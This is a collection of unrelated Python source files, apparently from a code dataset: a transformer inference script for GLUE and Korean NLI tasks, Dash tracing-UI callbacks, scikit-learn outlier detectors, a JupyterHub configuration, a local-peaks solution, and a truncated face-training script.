import re
from torch.utils.data import DataLoader
from transformers import AutoTokenizer, AutoModelForSequenceClassification, T5TokenizerFast, T5ForConditionalGeneration
from typing import List, Text
from tqdm import tqdm
from sklearn.metrics import precision_recall_fscore_support, accuracy_score
from models.kobart.tokenization_kobart import KoBartTokenizerFast as tok_kobart
from models.kobert.tokenization_kobert import KoBertTokenizer as tok_kobert
from models.kogpt2.tokenization_kogpt2 import KoGPT2TokenizerFast as tok_kogpt2
# Checkpoints loaded through AutoModelForSequenceClassification/AutoTokenizer.
AUTOMODEL_LIST = ['bert-base-cased', 'bert-large-cased', 'roberta-base', 'roberta-large',
                  'albert-base-v2', 'albert-large-v2', 'google/electra-small-discriminator',
                  'google/electra-large-discriminator', 'facebook/bart-base', 'monologg/koelectra-base-v2-discriminator',
                  'gpt2', 'gpt2-large', 'monologg/kobert', 'hyunwoongko/kobart', 'skt/kogpt2-base-v2']
# Model families that need the project-local Korean tokenizer classes
# (tok_kobert / tok_kobart / tok_kogpt2) instead of AutoTokenizer.
CUSTOM_TOKENIZER = ['kobert', 'kobart', 'kogpt2']
# Checkpoints loaded through T5ForConditionalGeneration.
T5MODEL_LIST = ['t5-base', 't5-large', 't5-3B', 't5-11B']
# English GLUE tasks supported by both model families.
GLUE_TASK_LIST = ['rte', 'mrpc', 'mnli', 'qnli', 'qqp']
# Korean tasks; only Auto-model dataset variants exist for these.
KOR_TASK_LIST = ['kornli', 'klue_nli', 'klue_sts']
class AutoModelInferencer:
    """Run batched classification inference with a sequence-classification
    model, returning the argmax label id for every example."""

    def __init__(
        self,
        model,
    ):
        """Pick the available device and move *model* onto it."""
        self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        self.model = model
        self.model.to(self.device)

    def __call__(self, data_loader) -> List:
        """Return predicted label ids for every batch in *data_loader*.

        Any 'labels' entry in a batch is dropped before the forward pass;
        all other tensors are moved to the model's device.
        """
        predictions = []
        for batch in tqdm(data_loader):
            model_inputs = {
                key: tensor.to(self.device)
                for key, tensor in batch.items()
                if key != 'labels'
            }
            logits = self.model(**model_inputs)['logits']
            predictions.extend(logits.argmax(dim=-1).detach().cpu().tolist())
        return predictions
class T5ModelInferencer:
    """Run batched generation inference with a T5 model and post-process
    each decoded sequence into a clean label string."""

    # Matches bare tags such as '<pad>' or '</s>'. Compiled once at class
    # creation instead of on every prepro_generated_sent() call.
    _TAG_PATTERN = re.compile('<[/a-zA-Z]+>')

    def __init__(
        self,
        model,
        tokenizer
    ):
        """Pick the available device, move *model* onto it and keep the
        tokenizer for decoding generated ids."""
        self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        self.model = model
        self.model.to(self.device)
        self.tokenizer = tokenizer

    def __call__(self, data_loader) -> List:
        """Generate (max_length=16) for every batch and return the decoded,
        tag-stripped strings. 'labels' entries are dropped before the
        forward pass; all other tensors are moved to the model's device."""
        outp = []
        for batch in tqdm(data_loader):
            inputs = dict()
            for key, value in batch.items():
                if key == 'labels':
                    continue
                inputs[key] = value.to(self.device)
            generated = self.model.generate(**inputs, max_length=16)
            for g_ in generated:
                o_ = self.tokenizer.decode(g_)
                outp.append(self.prepro_generated_sent(o_))
        return outp

    @staticmethod
    def prepro_generated_sent(sent: Text) -> Text:
        """Strip sentinel tags (e.g. '<pad>', '</s>') and surrounding
        whitespace from a decoded sentence."""
        return T5ModelInferencer._TAG_PATTERN.sub(repl='', string=sent).strip()
def prepare_model(args):
    """Build the (model, tokenizer) pair for ``args.model_type``.

    Sequence-classification checkpoints get ``num_labels`` from the task;
    T5 checkpoints are loaded for conditional generation. Printed messages
    and the pad-token fixup match the previous implementation.

    Args:
        args: parsed CLI namespace; ``model_type`` and ``dataset`` are read.

    Returns:
        Tuple of (model, tokenizer).

    Raises:
        NotImplementedError: for model types outside the supported lists.
    """
    # Number of output classes per finetuning task.
    n_class_dict = {
        "mnli": 3,
        "rte": 2,
        "qqp": 2,
        "qnli": 2,
        "mrpc": 2,
        "kornli": 3,
        "klue_sts": 2,
        "klue_nli": 3
    }
    # Explicit dispatch table replacing the previous eval() on a string
    # built from the CLI argument: same behavior, no string evaluation.
    custom_tokenizer_classes = {
        'kobert': tok_kobert,
        'kobart': tok_kobart,
        'kogpt2': tok_kogpt2,
    }
    print(f'model type: {args.model_type}')
    if args.model_type in AUTOMODEL_LIST:
        model = AutoModelForSequenceClassification.from_pretrained(args.model_type,
                                                                   num_labels=n_class_dict.get(args.dataset))
        # e.g. 'monologg/kobert' -> 'kobert', 'bert-base-cased' -> 'bert'
        normalized_model_type = args.model_type.split('/')[-1].split('-')[0]
        if normalized_model_type in custom_tokenizer_classes:
            tokenizer = custom_tokenizer_classes[normalized_model_type].from_pretrained(args.model_type)
            print(f'> load a custom tokenizer : {normalized_model_type}')
        else:
            tokenizer = AutoTokenizer.from_pretrained(args.model_type)
        # GPT-style checkpoints ship without a pad token; reuse EOS so that
        # padding-based batching works.
        if tokenizer.pad_token is None or model.config.pad_token_id is None:
            print('> A pad token is set to a eod_token')
            tokenizer.pad_token = tokenizer.eos_token
            model.config.pad_token_id = model.config.eos_token_id
    elif args.model_type in T5MODEL_LIST:
        model = T5ForConditionalGeneration.from_pretrained(args.model_type)
        tokenizer = T5TokenizerFast.from_pretrained(args.model_type)
    else:
        raise NotImplementedError
    return model, tokenizer
def prepare_data(args, tokenizer):
    """Instantiate the inference dataset for the requested task/model/format.

    The classes in the ``dataset`` module follow a strict naming scheme,
    ``{Task}{Family}Inference{Format}Dataset`` (e.g.
    ``RTEAutoInferenceReverseDataset``), so instead of enumerating every
    task/model/format combination (the previous ~150-line if/elif cascade),
    the class name is assembled and resolved dynamically. Behavior matches
    the original, including every NotImplementedError path.

    Args:
        args: parsed CLI namespace; ``dataset``, ``model_type``,
            ``input_format`` and ``data_type`` are read.
        tokenizer: tokenizer forwarded to the dataset constructor.

    Returns:
        The constructed inference dataset.

    Raises:
        NotImplementedError: when the task is unknown, the model family is
            unsupported, or a Korean task is paired with a T5 model.
    """
    # CLI task name -> CamelCase prefix used by the dataset class names.
    task_prefixes = {
        'rte': 'RTE',
        'mrpc': 'MRPC',
        'mnli': 'MNLI',
        'qnli': 'QNLI',
        'qqp': 'QQP',
        'kornli': 'KorNLI',
        'klue_nli': 'KlueNLI',
        'klue_sts': 'KlueSTS',
    }
    # Any input format other than these two maps to the 'Signal' variant,
    # mirroring the trailing else branches of the original cascade.
    format_suffixes = {'original': '', 'reverse': 'Reverse'}

    if args.dataset in GLUE_TASK_LIST:
        if args.model_type in AUTOMODEL_LIST:
            family = 'Auto'
        elif args.model_type in T5MODEL_LIST:
            family = 'T5'
        else:
            raise NotImplementedError
    elif args.dataset in KOR_TASK_LIST:
        # Korean tasks only ship Auto-model dataset variants.
        if args.model_type in AUTOMODEL_LIST:
            family = 'Auto'
        else:
            raise NotImplementedError
    else:
        raise NotImplementedError

    suffix = format_suffixes.get(args.input_format, 'Signal')
    class_name = f'{task_prefixes[args.dataset]}{family}Inference{suffix}Dataset'

    import dataset  # local import mirrors the original function-local imports
    dataset_cls = getattr(dataset, class_name)
    return dataset_cls(tokenizer, data_type=args.data_type)
def load_model_from_statedict(model, args):
    """Load a fine-tuned checkpoint into *model*.

    The checkpoint was saved by PyTorch Lightning, so every key carries a
    'model.' prefix that has to be stripped (and, for BART-family models,
    partially rewritten) before ``load_state_dict`` accepts it.
    """
    # e.g. 'hyunwoongko/kobart' -> 'kobart', 'bert-base-cased' -> 'bert'
    model_family = args.model_type.split('/')[-1].split('-')[0]
    ckpt_path = os.path.join(args.dir_path, args.model_dir, f'{model_family}-{args.dataset}.ckpt')
    if torch.cuda.is_available():
        print('> load model path : ', ckpt_path)
        checkpoint = torch.load(ckpt_path)
    else:
        checkpoint = torch.load(ckpt_path, map_location=torch.device('cpu'))

    remapped = {}
    for key, value in checkpoint['state_dict'].items():
        if model_family in ('kobart', 'bart') and 'classification' not in key:
            # BART backbone weights are nested one level deeper.
            remapped[key.replace('model.model', 'model')] = value
        else:
            remapped[key.replace('model.', '')] = value
    model.load_state_dict(remapped)
    return model
def main(args):
    """End-to-end inference: build model/tokenizer, load data, run the
    inferencer, score against gold labels on the validation split, and dump
    predictions (plus metrics, if computed) to a JSON file under save_dir.
    """
    dir_path = os.path.dirname(os.path.abspath(__file__))
    args.dir_path = dir_path
    print("Loading models...")
    if args.dataset in GLUE_TASK_LIST + KOR_TASK_LIST:
        model, tokenizer = prepare_model(args)
    else:
        raise NotImplementedError
    print("Loading data...")
    dataset = prepare_data(args, tokenizer)
    data_loader = DataLoader(dataset, batch_size=args.batch_size)
    # Auto models are restored from a fine-tuned checkpoint; T5 models run
    # with their pretrained weights through the generation inferencer.
    if args.model_type in AUTOMODEL_LIST:
        model = load_model_from_statedict(model, args)
        inferencer = AutoModelInferencer(model)
    elif args.model_type in T5MODEL_LIST:
        inferencer = T5ModelInferencer(model, tokenizer)
    else:
        raise NotImplementedError
    model.eval()
    predictions = inferencer(data_loader)
    perf_dict = {}
    # Metrics are only computable when gold labels exist (validation split).
    if args.data_type == 'validation':
        acc = accuracy_score(y_true=dataset.label, y_pred=predictions)
        precision, recall, f1, _ = precision_recall_fscore_support(
            y_true=dataset.label,
            y_pred=predictions,
            average='weighted'
        )
        perf_dict['accuracy'] = acc
        perf_dict['precision'] = precision
        perf_dict['recall'] = recall
        perf_dict['f1'] = f1
        print(f"{args.model_type}|{args.dataset}| Accuracy: {acc}")
    outputs = {
        "idx": [i for i in range(len(predictions))],
        # "inputs": [s for s in dataset.input_sents],
        "preds": predictions
    }
    if perf_dict:
        outputs.update(perf_dict)
    # One result file per model/task/split/format combination.
    save_path = os.path.join(dir_path, args.save_dir, args.model_type.split('/')[-1])
    os.makedirs(save_path, exist_ok=True)
    file_name = f"{args.dataset}-{args.data_type}-{args.input_format}.json"
    with open(os.path.join(save_path, file_name), 'w') as saveFile:
        json.dump(outputs, saveFile)
if __name__ == '__main__':
    # CLI entry point: every option below reaches main() through the
    # parsed argparse namespace.
    parser = argparse.ArgumentParser()
    parser.add_argument('--model_type', type=str, default='google/electra-small-discriminator',
                        help='type or pre-trained models')
    parser.add_argument('--dataset', type=str, default='mnli',
                        help='finetuning task name')
    parser.add_argument('--data_type', type=str, default='test', choices=['test', 'validation'],
                        help='type of data for inference')
    parser.add_argument('--input_format', type=str, default='original', choices=['original', 'reverse', 'signal'],
                        help='type of input format')
    parser.add_argument('--batch_size', type=int, default=20,
                        help='size of batch for inference')
    parser.add_argument('--save_dir', type=str, default='../result/',
                        help='directory to save results')
    parser.add_argument('--model_dir', type=str, default='../model_binary/',
                        help='directory path where binary file is saved')
    args = parser.parse_args()
    main(args)
| StarcoderdataPython |
11200520 | <gh_stars>0
'''
This module contains all callbacks regarding the realtime tracing
'''
from dash import callback_context
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
from tracerface.web_ui.alerts import (
ErrorAlert,
SuccessAlert,
TraceErrorAlert,
WarningAlert
)
from tracerface.web_ui.dashboard import Dashboard
from tracerface.web_ui.graph import Graph
from tracerface.web_ui.trace_setup import (
BinaryAlreadyAddedError,
BinaryNotExistsError,
ConfigFileError,
FunctionNotInBinaryError
)
# Disable function managagement buttons if no function is selected
def disable_manage_app_buttons(app):
output = [
Output('manage-functions-button', 'disabled'),
Output('remove-app-button', 'disabled')
]
input = [Input('applications-select', 'value')]
@app.callback(output, input)
def disable(app):
disabled = not app
return disabled, disabled
# Disable config load button if no path is provided
def disable_load_config_button(app):
output = Output('load-config-button', 'disabled')
input = [Input('config-file-path', 'value')]
@app.callback(output, input)
def disable(path):
return not path
# Load output of bcc trace output
def disable_load_button(app):
output = Output('load-output-button', 'disabled')
input = [Input('output-path', 'value')]
@app.callback(output, input)
def disable(content):
return not content
# Stop tracing if an error occurs
def stop_trace_on_error(app, trace_controller):
output = [
Output('trace-button', 'on'),
Output('trace-error-notification', 'children')
]
input = [Input('timer', 'n_intervals')]
state = [State('trace-button', 'on')]
@app.callback(output, input, state)
def stop_trace(timer_tick, trace_on):
if timer_tick and trace_on:
if trace_controller.thread_error():
return False, TraceErrorAlert(trace_controller.thread_error())
raise PreventUpdate
# Start realtime tracing
def start_or_stop_trace(app, call_graph, setup, trace_controller):
output = Output('timer', 'disabled')
input = [Input('trace-button', 'on')]
state = [State('timer', 'disabled')]
@app.callback(output, input, state)
def switch_state(trace_on, timer_disabled):
if trace_on:
call_graph.clear()
trace_controller.start_trace(setup.generate_bcc_args(), call_graph)
elif not timer_disabled:
trace_controller.stop_trace()
return not trace_on
# Update color slider based on graph and set colors
def update_color_slider(app, call_graph):
output = Output('slider-div', 'children')
input = [
Input('graph', 'elements'),
Input('timer', 'disabled')
]
@app.callback(output, input)
def update(elements, timer_off):
if not callback_context.triggered:
raise PreventUpdate
disabled = call_graph.max_count() < 1 or not timer_off
return Dashboard.slider(call_graph.get_yellow(), call_graph.get_red(),
call_graph.max_count(), disabled)
# Disable parts of the interface while tracing is active
def disable_searchbar(app, call_graph):
output = Output('searchbar', 'disabled')
input = [
Input('graph', 'elements'),
Input('timer', 'disabled')
]
@app.callback(output, input)
def switch_disables(elements, timer_off):
disabled = call_graph.max_count() < 1 or not timer_off
return disabled
# Update collection of apps to be traced
def update_apps_dropdown_options(app, setup):
output = [
Output('applications-select', 'options'),
Output('add-app-notification', 'children')
]
input = [
Input('add-app-button', 'n_clicks'),
Input('remove-app-button', 'n_clicks'),
Input('load-config-button', 'n_clicks')
]
state = [
State('application-path', 'value'),
State('applications-select', 'value'),
State('config-file-path', 'value')
]
@app.callback(output, input, state)
def update_options(add, remove, load, app_to_add, app_to_remove, config_path):
if not callback_context.triggered:
raise PreventUpdate
id = callback_context.triggered[0]['prop_id'].split('.')[0]
alert = None
if id == 'add-app-button' and app_to_add:
try:
setup.initialize_binary(app_to_add)
alert = SuccessAlert('Application added')
except BinaryNotExistsError:
msg = 'Binary not found at given path so it is assumed to be a built-in function'
alert = WarningAlert(msg)
setup.initialize_built_in(app_to_add)
elif id == 'remove-app-button' and app_to_remove:
setup.remove_app(app_to_remove)
elif id == 'load-config-button' and config_path:
try:
err_message = setup.load_from_file(config_path)
if err_message:
alert = WarningAlert(err_message)
else:
alert = SuccessAlert('Setup loaded')
except (BinaryAlreadyAddedError, ConfigFileError, FunctionNotInBinaryError) as e:
alert = ErrorAlert(str(e))
return [{"label": app, "value": app} for app in setup.get_apps()], alert
# Update value of application selection on application removal
def clear_selected_app(app):
output = Output('applications-select', 'value')
input = [
Input('remove-app-button', 'n_clicks'),
Input('add-app-button', 'n_clicks')
]
@app.callback(output, input)
def clear_value(add, remove):
if add or remove:
return None
raise PreventUpdate
# Save animation status and spacing between nodes
def update_graph_layout(app):
output = Output('graph', 'layout')
input = [
Input('animate-switch', 'value'),
Input('node-spacing-input', 'value')
]
@app.callback(output, input)
def update_spacing_and_animate(animate_switch, spacing):
animate = len(animate_switch) == 1
return Graph.layout(spacing=spacing, animate=animate)
| StarcoderdataPython |
6482543 | <gh_stars>1-10
# This file is part of the Data Cleaning Library (openclean).
#
# Copyright (C) 2018-2021 New York University.
#
# openclean is released under the Revised BSD License. See file LICENSE for
# full license details.
"""Generic outlier detector that uses scikit-learn outlier detection or
clustering algorithms.
"""
from collections import Counter
from sklearn.base import BaseEstimator
from typing import List, Optional
from openclean.embedding.base import Embedding, ValueEmbedder
from openclean.embedding.feature.default import StandardEmbedding
from openclean.profiling.anomalies.base import AnomalyDetector
class SklearnOutliers(AnomalyDetector):
    """Detect outliers in a given value stream based on a scikit-learn outlier
    detection or clustering algorithm. Expects a scikit-learn estimator and a
    value embedding generator. Outlier detection uses the fit_predict method
    of the scikit-learn estimator to get labels for each value. Values that
    are assigned a label of -1 are considered outliers.
    """
    def __init__(
        self, algorithm: BaseEstimator,
        features: Optional[ValueEmbedder] = None
    ):
        """Initialize the embedding generator and the outlier detection or
        clustering algorithm. If no feature generator is given the default
        feature generator is used.

        Parameters
        ----------
        algorithm: sklearn.base.BaseEstimator
            Algorithm that is used to detect outliers in a data stream.
        features: openclean.profiling.embedding.base.ValueEmbedder, optional
            Feature vector generator for values in a data stream.
        """
        self.algorithm = algorithm
        self.features = StandardEmbedding() if features is None else features

    def process(self, values: Counter) -> List:
        """Return the list of values that are identified as outliers. This
        anomaly detector does not provide any additional provenance for the
        detected outlier values (other than the name of the used algorithm).

        Parameters
        ----------
        values: dict
            Set of distinct scalar values or tuples of scalar values that are
            mapped to their respective frequency count.

        Returns
        -------
        list
        """
        # Get the vector embedding for all values in the data stream.
        vec = Embedding(features=self.features).exec(values)
        # Get labels using the fit_predict() method of the estimator.
        labels = self.algorithm.fit_predict(vec.data)
        # Values that were assigned the label -1 are the outliers. Relies on
        # vec.keys() iterating in the same order as the rows of vec.data
        # (the same assumption the original index-based loop made).
        return [key for key, label in zip(vec.keys(), labels) if label == -1]
class DBSCANOutliers(SklearnOutliers):
    """Perform outlier detection using DBSCAN clustering. Values that DBSCAN
    does not assign to any cluster (label -1) are reported as outliers.
    """
    def __init__(
        self, features=None, eps=0.5, min_samples=5, metric='minkowski',
        metric_params=None, algorithm='auto', leaf_size=30, p=2, n_jobs=None
    ):
        """Initialize the feature generator and the DBSCAN estimator.

        Parameters
        ----------
        features: openclean.profiling.embedding.base.ValueEmbedder, optional
            Generator for feature vectors that computes a vector of numeric
            values for a given scalar value (or tuple).
        eps : float, default=0.5
            The maximum distance between two samples for one to be considered
            as in the neighborhood of the other. This is the most important
            DBSCAN parameter to choose appropriately for your data set and
            distance function.
        min_samples : int, default=5
            The number of samples (or total weight) in a neighborhood for a
            point to be considered as a core point. This includes the point
            itself.
        metric : string, or callable
            The metric to use when calculating distance between instances in
            a feature array; any option allowed by
            :func:`sklearn.metrics.pairwise_distances`. If "precomputed", X
            is assumed to be a distance matrix and must be square during fit.
        metric_params : dict, default=None
            Additional keyword arguments for the metric function.
        algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
            The algorithm used by the NearestNeighbors module to compute
            pointwise distances and find nearest neighbors.
        leaf_size : int, default=30
            Leaf size passed to BallTree or cKDTree; affects speed and memory
            of construction and query.
        p : float, default=2
            The power of the Minkowski metric used to calculate distance
            between points.
        n_jobs : int, default=None
            The number of parallel jobs to run for neighbors search. ``None``
            means 1; ``-1`` means using all processors.

        See the scikit-learn documentation of :class:`sklearn.cluster.DBSCAN`
        for the full parameter descriptions.
        """
        # Import the DBSCAN estimator lazily, matching the pattern used by
        # the module-level helper functions.
        from sklearn.cluster import DBSCAN
        estimator = DBSCAN(
            eps=eps,
            min_samples=min_samples,
            metric=metric,
            metric_params=metric_params,
            algorithm=algorithm,
            leaf_size=leaf_size,
            p=p,
            n_jobs=n_jobs
        )
        # Python 3 zero-argument super() replaces the legacy two-argument
        # form used previously.
        super().__init__(algorithm=estimator, features=features)
# -- Functions for specific scikit-learn outlier detectors --------------------
def dbscan(
    df, columns, features=None, eps=0.5, min_samples=5, metric='minkowski',
    metric_params=None, algorithm='auto', leaf_size=30, p=2, n_jobs=None
):
    """Detect outliers using DBSCAN clustering. Values that DBSCAN does not
    assign to any cluster are returned as outliers.

    Parameters
    ----------
    df: pandas.DataFrame
        Input data frame.
    columns: list, tuple, or openclean.function.eval.base.EvalFunction
        Evaluation function (or list of functions, column names or index
        positions) used to extract values from data frame rows.
    features: openclean.profiling.embedding.base.ValueEmbedder, optional
        Generator that computes a numeric feature vector for a given scalar
        value (or tuple).
    eps : float, default=0.5
        Maximum distance between two samples for one to be considered as in
        the neighborhood of the other.
    min_samples : int, default=5
        Number of samples in a neighborhood for a point to be considered a
        core point (including the point itself).
    metric : string, or callable
        Distance metric; any option accepted by
        :func:`sklearn.metrics.pairwise_distances`.
    metric_params : dict, default=None
        Additional keyword arguments for the metric function.
    algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
        Nearest-neighbor search algorithm.
    leaf_size : int, default=30
        Leaf size passed to BallTree or cKDTree.
    p : float, default=2
        Power of the Minkowski metric.
    n_jobs : int, default=None
        Number of parallel jobs for the neighbors search.

    See :class:`sklearn.cluster.DBSCAN` for the full parameter details.

    Returns
    -------
    list
    """
    # Delegate to the DBSCAN-backed outlier detector and evaluate it over
    # the extracted column values.
    detector = DBSCANOutliers(
        features=features,
        eps=eps,
        min_samples=min_samples,
        metric=metric,
        metric_params=metric_params,
        algorithm=algorithm,
        leaf_size=leaf_size,
        p=p,
        n_jobs=n_jobs
    )
    return detector.run(df=df, columns=columns)
def isolation_forest(
    df, columns, features=None, n_estimators=100, max_samples='auto',
    contamination='auto', max_features=1., bootstrap=False, n_jobs=None,
    random_state=None, verbose=0, warm_start=False
):
    """Detect outliers using scikit-learn's IsolationForest ensemble.

    Parameters
    ----------
    df: pandas.DataFrame
        Input data frame.
    columns: list, tuple, or openclean.function.eval.base.EvalFunction
        Evaluation function (or list of functions, column names or index
        positions) used to extract values from data frame rows.
    features: openclean.profiling.embedding.base.ValueEmbedder, optional
        Generator that computes a numeric feature vector for a given scalar
        value (or tuple).
    n_estimators : int, default=100
        Number of base estimators in the ensemble.
    max_samples : "auto", int or float, default="auto"
        Number (int) or fraction (float) of samples used to train each base
        estimator; "auto" uses min(256, n_samples).
    contamination : 'auto' or float, default='auto'
        Expected proportion of outliers in the data set; used to define the
        threshold on the sample scores. Floats must be in [0, 0.5].
    max_features : int or float, default=1.0
        Number (int) or fraction (float) of features drawn to train each
        base estimator.
    bootstrap : bool, default=False
        If True, trees are fit on random subsets sampled with replacement.
    n_jobs : int, default=None
        Number of parallel jobs for fit and predict.
    random_state : int or RandomState, default=None
        Controls the pseudo-randomness for reproducible results.
    verbose : int, default=0
        Verbosity of the tree building process.
    warm_start : bool, default=False
        Reuse the solution of the previous fit and add more estimators.

    See :class:`sklearn.ensemble.IsolationForest` for the full details.

    Returns
    -------
    list
    """
    from sklearn.ensemble import IsolationForest
    estimator = IsolationForest(
        n_estimators=n_estimators,
        max_samples=max_samples,
        contamination=contamination,
        max_features=max_features,
        bootstrap=bootstrap,
        n_jobs=n_jobs,
        random_state=random_state,
        verbose=verbose,
        warm_start=warm_start
    )
    # Run the generic scikit-learn outlier detector with IsolationForest as
    # the estimator.
    return SklearnOutliers(algorithm=estimator, features=features).run(
        df=df, columns=columns
    )
def local_outlier_factor(
    df, columns, features=None, n_neighbors=20, algorithm='auto', leaf_size=30,
    metric='minkowski', p=2, metric_params=None, contamination='auto',
    novelty=False, n_jobs=None
):
    """Detect outliers using Local Outlier Factor (LOF).

    Parameters
    ----------
    df: pandas.DataFrame
        Input data frame.
    columns: list, tuple, or openclean.function.eval.base.EvalFunction
        Evaluation function (or list of functions, column names or index
        positions) used to extract values from data frame rows.
    features: openclean.profiling.embedding.base.ValueEmbedder
        Generator that computes a numeric feature vector for a given scalar
        value (or tuple).
    n_neighbors : int, default=20
        Number of neighbors used by default for kneighbors queries; capped
        at the number of samples provided.
    algorithm : {'auto', 'ball_tree', 'kd_tree', 'brute'}, default='auto'
        Nearest-neighbor search algorithm; sparse input forces brute force.
    leaf_size : int, default=30
        Leaf size passed to BallTree or KDTree.
    metric : str or callable, default='minkowski'
        Distance metric; any metric from scikit-learn or
        scipy.spatial.distance, or a callable over two arrays. If
        "precomputed", X is assumed to be a square distance matrix.
    p : int, default=2
        Minkowski metric parameter (1 = manhattan distance, 2 = euclidean).
    metric_params : dict, default=None
        Additional keyword arguments for the metric function.
    contamination : 'auto' or float, default='auto'
        Expected proportion of outliers; used to define the threshold on the
        sample scores. Floats must be in [0, 0.5].
    novelty : bool, default=False
        Set True to use LOF for novelty detection; then only use predict,
        decision_function and score_samples on unseen data.
    n_jobs : int, default=None
        Number of parallel jobs for the neighbors search.

    See :class:`sklearn.neighbors.LocalOutlierFactor` for the full details.

    Returns
    -------
    list
    """
    from sklearn.neighbors import LocalOutlierFactor
    estimator = LocalOutlierFactor(
        n_neighbors=n_neighbors,
        algorithm=algorithm,
        leaf_size=leaf_size,
        metric=metric,
        p=p,
        metric_params=metric_params,
        contamination=contamination,
        novelty=novelty,
        n_jobs=n_jobs
    )
    # Run the generic scikit-learn outlier detector with LocalOutlierFactor
    # as the estimator.
    return SklearnOutliers(algorithm=estimator, features=features).run(
        df=df, columns=columns
    )
def one_class_svm(
    df, columns, features=None, kernel='rbf', degree=3, gamma='scale',
    coef0=0.0, tol=1e-3, nu=0.5, shrinking=True, cache_size=200, verbose=False,
    max_iter=-1
):
    """Detect outliers using a one-class support vector machine
    (unsupervised outlier detection).

    Parameters
    ----------
    df: pandas.DataFrame
        Input data frame.
    columns: list, tuple, or openclean.function.eval.base.EvalFunction
        Evaluation function (or list of functions, column names or index
        positions) used to extract values from data frame rows.
    features: openclean.profiling.embedding.base.ValueEmbedder
        Generator that computes a numeric feature vector for a given scalar
        value (or tuple).
    kernel : {'linear', 'poly', 'rbf', 'sigmoid', 'precomputed'}, default='rbf'
        Kernel type used in the algorithm; a callable precomputes the kernel
        matrix.
    degree : int, default=3
        Degree of the polynomial kernel ('poly'); ignored by other kernels.
    gamma : {'scale', 'auto'} or float, default='scale'
        Kernel coefficient for 'rbf', 'poly' and 'sigmoid'.
    coef0 : float, default=0.0
        Independent kernel term; significant only in 'poly' and 'sigmoid'.
    tol : float, default=1e-3
        Tolerance for the stopping criterion.
    nu : float, default=0.5
        Upper bound on the fraction of training errors and lower bound on
        the fraction of support vectors; in the interval (0, 1].
    shrinking : bool, default=True
        Whether to use the shrinking heuristic.
    cache_size : float, default=200
        Size of the kernel cache in MB.
    verbose : bool, default=False
        Enable libsvm's per-process verbose output.
    max_iter : int, default=-1
        Hard iteration limit within the solver, or -1 for no limit.

    See :class:`sklearn.svm.OneClassSVM` for the full details.

    Returns
    -------
    list
    """
    from sklearn.svm import OneClassSVM
    estimator = OneClassSVM(
        kernel=kernel,
        degree=degree,
        gamma=gamma,
        coef0=coef0,
        tol=tol,
        nu=nu,
        shrinking=shrinking,
        cache_size=cache_size,
        verbose=verbose,
        max_iter=max_iter
    )
    # Run the generic scikit-learn outlier detector with OneClassSVM as the
    # estimator.
    return SklearnOutliers(algorithm=estimator, features=features).run(
        df=df, columns=columns
    )
def robust_covariance(
    df, columns, features=None, store_precision=True, assume_centered=False,
    support_fraction=None, contamination=0.1, random_state=None
):
    """Detect outliers with an EllipticEnvelope, which fits a robust
    covariance estimate for a Gaussian distributed dataset.

    Parameters
    ----------
    df: pandas.DataFrame
        Input data frame.
    columns: list, tuple, or openclean.function.eval.base.EvalFunction
        Evaluation function (or list of functions, column names or index
        positions) used to extract values from data frame rows.
    features: openclean.profiling.embedding.base.ValueEmbedder
        Generator that computes a numeric feature vector for a given scalar
        value (or tuple).
    store_precision : bool, default=True
        Whether the estimated precision is stored.
    assume_centered : bool, default=False
        If True, robust location and covariance are computed from the
        support without centering the data; useful when the mean is
        (nearly) zero.
    support_fraction : float, default=None
        Proportion of points included in the support of the raw MCD
        estimate; None uses the algorithm minimum
        `[n_sample + n_features + 1] / 2`. Range is (0, 1).
    contamination : float, default=0.1
        Expected proportion of outliers in the data set. Range is (0, 0.5).
    random_state : int or RandomState instance, default=None
        Seed for the pseudo random number generator used to shuffle data.

    See :class:`sklearn.covariance.EllipticEnvelope` for the full details.

    Returns
    -------
    list
    """
    from sklearn.covariance import EllipticEnvelope
    estimator = EllipticEnvelope(
        store_precision=store_precision,
        assume_centered=assume_centered,
        support_fraction=support_fraction,
        contamination=contamination,
        random_state=random_state
    )
    # Run the generic scikit-learn outlier detector with EllipticEnvelope as
    # the estimator.
    return SklearnOutliers(algorithm=estimator, features=features).run(
        df=df, columns=columns
    )
| StarcoderdataPython |
4821811 | <reponame>hhefzi/CKG<gh_stars>0
#------------------------------------------------------------------------------
# Configuration file for jupyterhub.
#------------------------------------------------------------------------------
# Set of users who can administer the Hub itself.
c.Authenticator.admin_users = {'adminhub'}
# Clinical Knowledge Graph logo shown in the JupyterHub UI.
c.JupyterHub.logo_file = '/CKG/src/report_manager/assets/logo_small.jpg'
## The public facing port of the proxy.
c.JupyterHub.port = 8090
# Directory that every spawned single-user notebook server starts in.
c.Spawner.notebook_dir='/CKG/src/notebooks'
# Create local system users on first login. Supports Linux and BSD variants only.
c.LocalAuthenticator.create_system_users = True
## The command to use for creating users, as a list of strings.
c.Authenticator.add_user_cmd = ['adduser', '--force-badname', '-q', '--gecos', '""', '--disabled-password']
# Optional: use Google OAuth instead of the local authenticator. Kept
# disabled; fill in the callback URL, client id and client secret to enable.
# from oauthenticator.google import GoogleOAuthenticator
# c.JupyterHub.authenticator_class = GoogleOAuthenticator
# c.GoogleOAuthenticator.oauth_callback_url = 'http://example.com/hub/oauth_callback'
# c.GoogleOAuthenticator.client_id = '635823090211-nhef5sl5sqdbq469k4t0l5d14ur7jc8j.apps.googleusercontent.com'
# c.GoogleOAuthenticator.client_secret = '<KEY>'
# Optional: start single-user servers in JupyterLab instead of the classic UI.
#c.Spawner.default_url = '/lab'
| StarcoderdataPython |
1648154 | <filename>1014 Find Local Peaks.py
class Solution:
    def solve(self, nums):
        """Return the indices of all strict local peaks in *nums*.

        An index i is a peak when nums[i] is strictly greater than both of
        its existing neighbors; boundary elements only need to beat their
        single neighbor. A single-element list has no peaks by definition.
        """
        if len(nums) == 1:
            return []
        # Rewritten from a filter/lambda one-liner with nested conditional
        # expressions into an explicit, readable loop (same behavior).
        last = len(nums) - 1
        peaks = []
        for i, value in enumerate(nums):
            left_ok = value > nums[i - 1] if i > 0 else True
            right_ok = value > nums[i + 1] if i < last else True
            if left_ok and right_ok:
                peaks.append(i)
        return peaks
| StarcoderdataPython |
11321923 | # Author <NAME>
import click
import os
import cv2
import shutil
import random
import time
from faces_train import train_faces
def unique_id():
    """
    Generator for id values: starts at a random 32-bit seed and counts up.
